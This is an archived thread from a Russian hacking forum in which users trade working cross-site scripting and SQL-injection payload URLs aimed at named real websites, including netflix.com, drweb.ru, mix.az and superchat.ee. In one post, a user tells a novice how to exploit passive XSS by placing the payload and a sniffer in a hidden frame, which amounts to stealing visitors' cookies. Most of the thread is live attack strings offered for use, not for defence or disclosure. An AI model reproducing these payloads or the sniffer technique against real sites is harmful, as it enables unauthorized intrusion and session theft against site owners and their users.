ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ_OLD > Уязвимости
   
 
 
Опции темы Поиск в этой теме Опции просмотра

  #31  
Старый 21.11.2005, 01:52
k1b0rg
Тут может быть ваша реклама.
Регистрация: 30.07.2005
Сообщений: 1,243
Провел на форуме:
4520553

Репутация: 1316


По умолчанию

http://www.wargames.ru/search.php?query=%27
http://www.ccg.ru/sections.php?op=listarticles&secid=285'
http://www.rolemancer.ru/search.php?query=%27
http://rulezzz.dp.ua/fotos/<script>alert()</script>
http://listsoft.ru/search.php?q=%27%...me=yes&tip=yes
http://opengl.net/ поиск "style=background:url(javascript:alert());"
http://www.eurochat.ru/?go=gal&page=7"><script>alert()</script>
http://www.netflix.com/MovieDisplay?movieid=70011207<script>alert()</script>&trkid=135437
http://a9.com/-/search/imageResult?q=666&t=f1263.jpg&ru="style=background :url(javascript:alert(1));&u="style=background:url (javascript:alert(2));&ih=296&iw=425&th=84&tw=122& id=I-RBtbW0cGoJ
 

  #32  
Старый 21.11.2005, 19:43
Tem
Banned
Регистрация: 05.10.2005
Сообщений: 965
Провел на форуме:
5888800

Репутация: 547


Отправить сообщение для Tem с помощью ICQ
По умолчанию

k1b0rg

Вопрос лично к тебе, я в нахождение багов новичок, вот нашёл тут одну вешь, может подскажеш как им воспользоватся ?

http://www.mix.az/engine/modules/imagepreview.php?image='
 

  #33  
Старый 21.11.2005, 20:47
k00p3r
Banned
Регистрация: 31.05.2005
Сообщений: 549
Провел на форуме:
484586

Репутация: 16


Отправить сообщение для k00p3r с помощью ICQ
По умолчанию

Ну и какая ж там бага? =)
 

  #34  
Старый 21.11.2005, 21:04
k1b0rg
Тут может быть ваша реклама.
Регистрация: 30.07.2005
Сообщений: 1,243
Провел на форуме:
4520553

Репутация: 1316


По умолчанию

вот бага
http://www.mix.az/engine/modules/imagepreview.php?image=');</script><script>alert()</script>
а как воспользоваться ,ищи в поиске "пассивные xss"
здесь описывать не буду, много, ды это прочитай а что непонятное спрашивай.
ОБНОВЛЕНИЕ
http://www.drweb.ru/buy/invoice/?computers=&period=1y&email=%22%3E%3Cscript%3Ealer t%281%29%3C%2Fscript%3E&phone=%22%3E%3Cscript%3Eal ert%282%29%3C%2Fscript%3E&j_address=%22%3E%3Cscrip t%3Ealert%283%29%3C%2Fscript%3E&m_address=%22%3E%3 Cscript%3Ealert%284%29%3C%2Fscript%3E&org=%22%3E%3 Cscript%3Ealert%285%29%3C%2Fscript%3E&kpp=%22%3E%3 Cscript%3Ealert(6)</script>&currency=RUR&act=finish&prodid=01-D
http://www.multitran.ru/c/m.exe?HL=2...3C%2Fscript%3E
http://bugs.php.net/report.php?in%5B...n%5Bactres%5D=
http://www.cafepress.com/cp/search/s...cfpt=&x=26&y=8
http://www.phpbbhacks.com/searchresults.php?version=2"><script>alert()</script>&query=666&search_type=1&Submit=Go
http://www.tstyle.ru/price/1001636'
http://xrout.org/index.php поиск "><script>alert()</script>
http://www.etegro.com/rus/?module=items&id=22'"&text=1"><script>alert()</script>

Последний раз редактировалось k1b0rg; 21.11.2005 в 21:07..
 

  #35  
Старый 21.11.2005, 22:17
Tem
Banned
Регистрация: 05.10.2005
Сообщений: 965
Провел на форуме:
5888800

Репутация: 547


Отправить сообщение для Tem с помощью ICQ
По умолчанию

Я искал, 3 часа но всё без успешно, нечего не нашёл, как юзать пасивный Xss. Может в аське поговорим ?
 

  #36  
Старый 21.11.2005, 22:31
k1b0rg
Тут может быть ваша реклама.
Регистрация: 30.07.2005
Сообщений: 1,243
Провел на форуме:
4520553

Репутация: 1316


По умолчанию

Цитата:
Я искал, 3 часа но всё без успешно, нечего не нашёл, как юзать пасивный Xss. Может в аське поговорим ?
на почитай
http://dante.net.ru/forum/printthread.php?t=225
а так общий вид сводиться к тому, что имеется допустим твоя страничка, ставишь на нее два фрейма, один скрытый, в него помещаешь xss пасивную и сниффер.
это я тебе на "пальцах объяснил"
 

  #37  
Старый 22.11.2005, 04:07
porter
Познающий
Регистрация: 01.03.2005
Сообщений: 80
Провел на форуме:
606375

Репутация: 12
По умолчанию

k1b0rg глянь сайт www.superchat.ee
говорят что очень хорошо защищён)
 

  #38  
Старый 22.11.2005, 07:41
Morph
Постоянный
Регистрация: 13.08.2004
Сообщений: 957
Провел на форуме:
1770063

Репутация: 429


По умолчанию

Раньше тоже бегал искал потом понял.

Вот тебе XSS на твоем чате
http://www.superchat.ee/cgi-bin/00/User.Info?<script>alert(/XSS/)</script>&info

Последний раз редактировалось Morph; 22.11.2005 в 07:49..
 

  #39  
Старый 22.11.2005, 13:36
k1b0rg
Тут может быть ваша реклама.
Регистрация: 30.07.2005
Сообщений: 1,243
Провел на форуме:
4520553

Репутация: 1316


По умолчанию

http://www.superchat.ee/cgi-bin/gallery?cat=M&show="+style%3Dbackground:url(javasc ript:alert());"
вот тебе еще код
хаха, сделали защиту от =.
и ваще люди, когда вы говорите найдите мне уязвимость, то не надо потом кричать как ею воспользоваться!
 

  #40  
Старый 22.11.2005, 13:42
Бафун
Banned
Регистрация: 19.11.2005
Сообщений: 17
Провел на форуме:
49385

Репутация: 1
По умолчанию

http://www.hackthissite.org

Найди мне багу здесь.

Последний раз редактировалось Бафун; 22.11.2005 в 13:54..
 
 





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ